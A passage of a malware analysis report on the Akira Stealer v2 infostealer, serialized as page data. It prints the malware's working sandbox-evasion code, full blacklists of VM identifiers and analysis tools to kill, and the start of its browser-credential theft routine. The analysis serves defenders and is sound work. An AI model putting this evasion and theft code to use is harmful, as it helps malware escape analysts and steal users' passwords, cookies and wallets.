VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[3724,18526,18527,18531,18536,18541,18546,18550,18555,18560,18565,18570],{"__ignoreMap":402},[7258,18528,18529],{"class":14951,"line":14952},[7258,18530,18242],{},[7258,18532,18533],{"class":14951,"line":403},[7258,18534,18535],{},"def checkUsers() -> bool:\n",[7258,18537,18538],{"class":14951,"line":704},[7258,18539,18540],{},"    user = os.getlogin().lower()\n",[7258,18542,18543],{"class":14951,"line":15337},[7258,18544,18545],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[7258,18547,18548],{"class":14951,"line":13492},[7258,18549,17114],{"emptyLinePlaceholder":415},[7258,18551,18552],{"class":14951,"line":15666},[7258,18553,18554],{},"BLACKLISTED_USERS = (\n",[7258,18556,18557],{"class":14951,"line":13493},[7258,18558,18559],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[7258,18561,18562],{"class":14951,"line":17117},[7258,18563,18564],{},"    'a.monaldo','tvm',\n",[7258,18566,18567],{"class":14951,"line":17123},[7258,18568,18569],{},"    # ... 30+ more entries ...\n",[7258,18571,18572],{"class":14951,"line":17369},[7258,18573,18509],{},[353,18575,18576],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[629,18578,18580],{"id":18579},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[353,18582,14147],{},[353,18584,18585,18586,18589],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. In this case, a simple HTTP request is made to ",[3724,18587,18588],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[3102,18591,18593],{"className":17754,"code":18592,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[3724,18594,18595,18599,18604,18609,18613,18618,18623,18628,18633,18637],{"__ignoreMap":402},[7258,18596,18597],{"class":14951,"line":14952},[7258,18598,18242],{},[7258,18600,18601],{"class":14951,"line":403},[7258,18602,18603],{},"def checkHosting() -> bool:\n",[7258,18605,18606],{"class":14951,"line":704},[7258,18607,18608],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[7258,18610,18611],{"class":14951,"line":15337},[7258,18612,18405],{},[7258,18614,18615],{"class":14951,"line":13492},[7258,18616,18617],{},"        return http.request(\n",[7258,18619,18620],{"class":14951,"line":15666},[7258,18621,18622],{},"            'GET',\n",[7258,18624,18625],{"class":14951,"line":13493},[7258,18626,18627],{},"            'http://ip-api.com/line/?fields=hosting'\n",[7258,18629,18630],{"class":14951,"line":17117},[7258,18631,18632],{},"        ).data.decode().strip() == 'true'\n",[7258,18634,18635],{"class":14951,"line":17123},[7258,18636,18430],{},[7258,18638,18639],{"class":14951,"line":17369},[7258,18640,18641],{},"        return False\n",[353,18643,18644],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[629,18646,18648],{"id":18647},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[353,18650,14147],{},[353,18652,18653,18654,18657],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under ",[3724,18655,18656],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[3102,18659,18661],{"className":17754,"code":18660,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[3724,18662,18663,18667,18672,18677,18681,18686,18690,18694],{"__ignoreMap":402},[7258,18664,18665],{"class":14951,"line":14952},[7258,18666,18242],{},[7258,18668,18669],{"class":14951,"line":403},[7258,18670,18671],{},"def checkHTTPSimulation() -> bool:\n",[7258,18673,18674],{"class":14951,"line":704},[7258,18675,18676],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[7258,18678,18679],{"class":14951,"line":15337},[7258,18680,18405],{},[7258,18682,18683],{"class":14951,"line":13492},[7258,18684,18685],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[7258,18687,18688],{"class":14951,"line":15666},[7258,18689,18430],{},[7258,18691,18692],{"class":14951,"line":13493},[7258,18693,18641],{},[7258,18695,18696],{"class":14951,"line":17117},[7258,18697,18698],{},"    return True\n",[353,18700,18701],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[629,18703,18705],{"id":18704},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[353,18707,14147],{},[353,18709,18710,18711,18714],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[3724,18712,18713],{},"wmic"," for suspicious GPU strings.",[3102,18716,18718],{"className":17754,"code":18717,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[3724,18719,18720,18724,18729,18734,18739,18744,18749,18754,18758,18762,18767,18772,18777,18782,18787,18792],{"__ignoreMap":402},[7258,18721,18722],{"class":14951,"line":14952},[7258,18723,18242],{},[7258,18725,18726],{"class":14951,"line":403},[7258,18727,18728],{},"def checkRegistry() -> bool:\n",[7258,18730,18731],{"class":14951,"line":704},[7258,18732,18733],{},"    r1 = subprocess.run(\n",[7258,18735,18736],{"class":14951,"line":15337},[7258,18737,18738],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[7258,18740,18741],{"class":14951,"line":13492},[7258,18742,18743],{},"        capture_output=True, shell=True)\n",[7258,18745,18746],{"class":14951,"line":15666},[7258,18747,18748],{},"    r2 = subprocess.run(\n",[7258,18750,18751],{"class":14951,"line":13493},[7258,18752,18753],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[7258,18755,18756],{"class":14951,"line":17117},[7258,18757,18743],{},[7258,18759,18760],{"class":14951,"line":17123},[7258,18761,17114],{"emptyLinePlaceholder":415},[7258,18763,18764],{"class":14951,"line":17369},[7258,18765,18766],{},"    # GPU name check\n",[7258,18768,18769],{"class":14951,"line":18290},[7258,18770,18771],{},"    gpu_out = subprocess.run(\n",[7258,18773,18774],{"class":14951,"line":18296},[7258,18775,18776],{},"        \"wmic path win32_VideoController get name\",\n",[7258,18778,18779],{"class":14951,"line":18302},[7258,18780,18781],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[7258,18783,18784],{"class":14951,"line":18308},[7258,18785,18786],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[7258,18788,18789],{"class":14951,"line":18314},[7258,18790,18791],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[7258,18793,18794],{"class":14951,"line":18320},[7258,18795,18796],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[353,18798,18799],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[629,18801,18803],{"id":18802},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[353,18805,14147],{},[353,18807,18808],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[3102,18810,18812],{"className":17754,"code":18811,"language":17756,"meta":402,"style":402},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... dozens more ...\n  'glasswire','requestly'\n)\n",[3724,18813,18814,18818,18823,18828,18832,18837,18842,18847,18852],{"__ignoreMap":402},[7258,18815,18816],{"class":14951,"line":14952},[7258,18817,18242],{},[7258,18819,18820],{"class":14951,"line":403},[7258,18821,18822],{},"def killTasks() -> None:\n",[7258,18824,18825],{"class":14951,"line":704},[7258,18826,18827],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[7258,18829,18830],{"class":14951,"line":15337},[7258,18831,17114],{"emptyLinePlaceholder":415},[7258,18833,18834],{"class":14951,"line":13492},[7258,18835,18836],{},"BLACKLISTED_TASKS = (\n",[7258,18838,18839],{"class":14951,"line":15666},[7258,18840,18841],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[7258,18843,18844],{"class":14951,"line":13493},[7258,18845,18846],{},"  # ... dozens more ...\n",[7258,18848,18849],{"class":14951,"line":17117},[7258,18850,18851],{},"  'glasswire','requestly'\n",[7258,18853,18854],{"class":14951,"line":17123},[7258,18855,18509],{},[353,18857,18858],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[353,18860,18861],{},[433,18862,6813],{},[353,18864,18865],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[353,18867,18868],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[629,18870,18872],{"id":18871},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[353,18874,14147],{},[353,18876,18877],{},[433,18878,18879],{},"Blacklisted Hardware UUIDs",[3102,18881,18884],{"className":18882,"code":18883,"language":3722},[3720],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[3724,18885,18883],{"__ignoreMap":402},[353,18887,18888],{},[433,18889,18890],{},"Blacklisted Computer Names",[3102,18892,18895],{"className":18893,"code":18894,"language":3722},[3720],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[3724,18896,18894],{"__ignoreMap":402},[353,18898,18899],{},[433,18900,18901],{},"Blacklisted User Accounts",[3102,18903,18906],{"className":18904,"code":18905,"language":3722},[3720],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[3724,18907,18905],{"__ignoreMap":402},[353,18909,18910],{},[433,18911,18912],{},"Blacklisted Analysis‐Tool Processes",[3102,18914,18917],{"className":18915,"code":18916,"language":3722},[3720],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[3724,18918,18916],{"__ignoreMap":402},[353,18920,18921],{},[433,18922,18923],{},"Core Detection Methods",[3102,18925,18927],{"className":17754,"code":18926,"language":17756,"meta":402,"style":402},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[3724,18928,18929,18933,18937,18942,18946,18950,18955,18960,18965,18969,18973,18977,18981,18985,18989,18994,18999,19003,19007,19011,19016,19021,19025,19029,19033,19038,19043,19048,19053,19059,19064,19069,19074,19079,19084,19089,19095,19101,19107,19112,19117,19122,19127,19133,19138,19143,19148,19153,19158,19163,19169,19175,19181,19187,19192,19197,19203,19209,19215,19221,19226,19231,19237,19242,19247,19253,19259,19265,19270,19276,19282,19287,19293,19299,19304,19309,19314,19320],{"__ignoreMap":402},[7258,18930,18931],{"class":14951,"line":14952},[7258,18932,18242],{},[7258,18934,18935],{"class":14951,"line":403},[7258,18936,18400],{},[7258,18938,18939],{"class":14951,"line":704},[7258,18940,18941],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[7258,18943,18944],{"class":14951,"line":15337},[7258,18945,18405],{},[7258,18947,18948],{"class":14951,"line":13492},[7258,18949,18410],{},[7258,18951,18952],{"class":14951,"line":15666},[7258,18953,18954],{},"            \"wmic csproduct get uuid\",\n",[7258,18956,18957],{"class":14951,"line":13493},[7258,18958,18959],{},"            shell=True, capture_output=True\n",[7258,18961,18962],{"class":14951,"line":17117},[7258,18963,18964],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[7258,18966,18967],{"class":14951,"line":17123},[7258,18968,18430],{},[7258,18970,18971],{"class":14951,"line":17369},[7258,18972,18435],{},[7258,18974,18975],{"class":14951,"line":18290},[7258,18976,18440],{},[7258,18978,18979],{"class":14951,"line":18296},[7258,18980,17114],{"emptyLinePlaceholder":415},[7258,18982,18983],{"class":14951,"line":18302},[7258,18984,18242],{},[7258,18986,18987],{"class":14951,"line":18308},[7258,18988,18470],{},[7258,18990,18991],{"class":14951,"line":18314},[7258,18992,18993],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[7258,18995,18996],{"class":14951,"line":18320},[7258,18997,18998],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[7258,19000,19001],{"class":14951,"line":18326},[7258,19002,17114],{"emptyLinePlaceholder":415},[7258,19004,19005],{"class":14951,"line":18332},[7258,19006,18242],{},[7258,19008,19009],{"class":14951,"line":18338},[7258,19010,18535],{},[7258,19012,19013],{"class":14951,"line":18344},[7258,19014,19015],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[7258,19017,19018],{"class":14951,"line":18350},[7258,19019,19020],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[7258,19022,19023],{"class":14951,"line":18356},[7258,19024,17114],{"emptyLinePlaceholder":415},[7258,19026,19027],{"class":14951,"line":18362},[7258,19028,18242],{},[7258,19030,19031],{"class":14951,"line":18368},[7258,19032,18603],{},[7258,19034,19035],{"class":14951,"line":18374},[7258,19036,19037],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[7258,19039,19041],{"class":14951,"line":19040},26,[7258,19042,18608],{},[7258,19044,19046],{"class":14951,"line":19045},27,[7258,19047,18405],{},[7258,19049,19051],{"class":14951,"line":19050},28,[7258,19052,18617],{},[7258,19054,19056],{"class":14951,"line":19055},29,[7258,19057,19058],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[7258,19060,19062],{"class":14951,"line":19061},30,[7258,19063,18632],{},[7258,19065,19067],{"class":14951,"line":19066},31,[7258,19068,18430],{},[7258,19070,19072],{"class":14951,"line":19071},32,[7258,19073,18641],{},[7258,19075,19077],{"class":14951,"line":19076},33,[7258,19078,17114],{"emptyLinePlaceholder":415},[7258,19080,19082],{"class":14951,"line":19081},34,[7258,19083,18242],{},[7258,19085,19087],{"class":14951,"line":19086},35,[7258,19088,18671],{},[7258,19090,19092],{"class":14951,"line":19091},36,[7258,19093,19094],{},"    \"\"\"\n",[7258,19096,19098],{"class":14951,"line":19097},37,[7258,19099,19100],{},"    Attempt TLS to random subdomain.\n",[7258,19102,19104],{"class":14951,"line":19103},38,[7258,19105,19106],{},"    Failure → possible HTTPS interception/sandbox.\n",[7258,19108,19110],{"class":14951,"line":19109},39,[7258,19111,19094],{},[7258,19113,19115],{"class":14951,"line":19114},40,[7258,19116,18676],{},[7258,19118,19120],{"class":14951,"line":19119},41,[7258,19121,18405],{},[7258,19123,19125],{"class":14951,"line":19124},42,[7258,19126,18685],{},[7258,19128,19130],{"class":14951,"line":19129},43,[7258,19131,19132],{},"        return True\n",[7258,19134,19136],{"class":14951,"line":19135},44,[7258,19137,18430],{},[7258,19139,19141],{"class":14951,"line":19140},45,[7258,19142,18641],{},[7258,19144,19146],{"class":14951,"line":19145},46,[7258,19147,17114],{"emptyLinePlaceholder":415},[7258,19149,19151],{"class":14951,"line":19150},47,[7258,19152,18242],{},[7258,19154,19156],{"class":14951,"line":19155},48,[7258,19157,18728],{},[7258,19159,19161],{"class":14951,"line":19160},49,[7258,19162,19094],{},[7258,19164,19166],{"class":14951,"line":19165},50,[7258,19167,19168],{},"    Look for VirtualBox/VMware in:\n",[7258,19170,19172],{"class":14951,"line":19171},51,[7258,19173,19174],{},"    - Registry driver entries\n",[7258,19176,19178],{"class":14951,"line":19177},52,[7258,19179,19180],{},"    - Video card name via WMIC\n",[7258,19182,19184],{"class":14951,"line":19183},53,[7258,19185,19186],{},"    - Presence of VM-specific folders\n",[7258,19188,19190],{"class":14951,"line":19189},54,[7258,19191,19094],{},[7258,19193,19195],{"class":14951,"line":19194},55,[7258,19196,18733],{},[7258,19198,19200],{"class":14951,"line":19199},56,[7258,19201,19202],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[7258,19204,19206],{"class":14951,"line":19205},57,[7258,19207,19208],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[7258,19210,19212],{"class":14951,"line":19211},58,[7258,19213,19214],{},"        shell=True, capture_output=True\n",[7258,19216,19218],{"class":14951,"line":19217},59,[7258,19219,19220],{},"    )\n",[7258,19222,19224],{"class":14951,"line":19223},60,[7258,19225,18748],{},[7258,19227,19229],{"class":14951,"line":19228},61,[7258,19230,19202],{},[7258,19232,19234],{"class":14951,"line":19233},62,[7258,19235,19236],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[7258,19238,19240],{"class":14951,"line":19239},63,[7258,19241,19214],{},[7258,19243,19245],{"class":14951,"line":19244},64,[7258,19246,19220],{},[7258,19248,19250],{"class":14951,"line":19249},65,[7258,19251,19252],{},"    gpu = any(\n",[7258,19254,19256],{"class":14951,"line":19255},66,[7258,19257,19258],{},"        x.lower() in subprocess.run(\n",[7258,19260,19262],{"class":14951,"line":19261},67,[7258,19263,19264],{},"            \"wmic path win32_VideoController get name\",\n",[7258,19266,19268],{"class":14951,"line":19267},68,[7258,19269,18959],{},[7258,19271,19273],{"class":14951,"line":19272},69,[7258,19274,19275],{},"        ).stdout.decode().splitlines()[2].lower()\n",[7258,19277,19279],{"class":14951,"line":19278},70,[7258,19280,19281],{},"        for x in (\"virtualbox\", \"vmware\")\n",[7258,19283,19285],{"class":14951,"line":19284},71,[7258,19286,19220],{},[7258,19288,19290],{"class":14951,"line":19289},72,[7258,19291,19292],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[7258,19294,19296],{"class":14951,"line":19295},73,[7258,19297,19298],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[7258,19300,19302],{"class":14951,"line":19301},74,[7258,19303,17114],{"emptyLinePlaceholder":415},[7258,19305,19307],{"class":14951,"line":19306},75,[7258,19308,18242],{},[7258,19310,19312],{"class":14951,"line":19311},76,[7258,19313,18822],{},[7258,19315,19317],{"class":14951,"line":19316},77,[7258,19318,19319],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[7258,19321,19323],{"class":14951,"line":19322},78,[7258,19324,18827],{},[629,19326,19328],{"id":19327},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[353,19330,14147],{},[5026,19332,19333,19347,19360],{},[370,19334,19335,19338,19339,19342,19343,19346],{},[433,19336,19337],{},"Initialization:"," Within the ",[3724,19340,19341],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[3724,19344,19345],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[370,19348,19349,19352,19353,19356,19357,19359],{},[433,19350,19351],{},"Deep Inspection:"," If the initial test passes, it calls ",[3724,19354,19355],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[3724,19358,18588],{},", and registry artifact scanning.",[370,19361,19362,19365,19366,19368,19369,19371],{},[433,19363,19364],{},"Abort Path:"," If any check returns ",[3724,19367,17931],{},", indicating a virtual or analysis environment, the code executes ",[3724,19370,17935],{},", terminating execution before any data collection or exfiltration routines.",[629,19373,19375],{"id":19374},"_7314-conclusion","7.3.14 Conclusion",[353,19377,14147],{},[353,19379,15859,19380,19382,19383,19385],{},[3724,19381,17879],{}," module in ",[748,19384,13939],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[2548,19387,19389],{"id":19388},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[353,19391,10713],{},[353,19393,19394,19395,13854,19398,19401],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[433,19396,19397],{},"Chromium-based",[433,19399,19400],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[353,19403,19404],{},[433,19405,19406],{},"1. Workspace Setup",[3102,19408,19410],{"className":17754,"code":19409,"language":17756,"meta":402,"style":402},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[3724,19411,19412,19417,19422,19427],{"__ignoreMap":402},[7258,19413,19414],{"class":14951,"line":14952},[7258,19415,19416],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[7258,19418,19419],{"class":14951,"line":403},[7258,19420,19421],{},"os.makedirs(client_dir, exist_ok=True)\n",[7258,19423,19424],{"class":14951,"line":704},[7258,19425,19426],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[7258,19428,19429],{"class":14951,"line":15337},[7258,19430,19431],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[367,19433,19434,19441,19444,19447,19450],{},[370,19435,19436,19437],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[19438,19439,19440],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[370,19442,19443],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[370,19445,19446],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[370,19448,19449],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files behind.",[370,19451,19452],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file 